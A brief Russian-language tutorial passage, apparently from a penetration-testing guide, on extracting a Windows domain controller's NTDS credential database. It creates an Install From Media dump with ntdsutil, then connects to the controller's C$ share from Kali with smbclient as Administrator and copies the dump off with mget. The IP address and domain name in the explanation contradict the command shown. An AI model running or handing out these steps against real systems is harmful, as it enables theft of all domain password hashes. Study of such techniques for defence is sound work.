Воспользуемся базовыми средствами Windows для работы с NTDS. Необходимо зайти в командную строку от имени администратора и ввести команды:
ntdsutil activate instance ntds ifm create full C:\temp
Этот набор команд активирует процесс Install From Media, позволяющий сделать копию нашего NTDS с необходимыми ветками реестра.
Эти же команды приведены на скриншоте ниже:
После этого в директории C:\temp вы увидите созданые файлы дампа
Воспользуемся базовыми средствами Kali Linux. С помощью SMB зайдём на сервер Win с Kali:
smbclient '\\\\\\192.168.10.200\\C$' -U PT/Administrator
- где 192.168.10.201 -- ip адрес контроллера домена,
- testdomain -- имя домена,
- Administrator -- имя учетной записи с правами администратора.
После чего скопируем файлы на Kali:
recurse ON prompt OFF lcd /home/user mget temp
- где /home/user -- домашняя папка пользователя Kali linux
Эти же команды приведены на скриншоте ниже: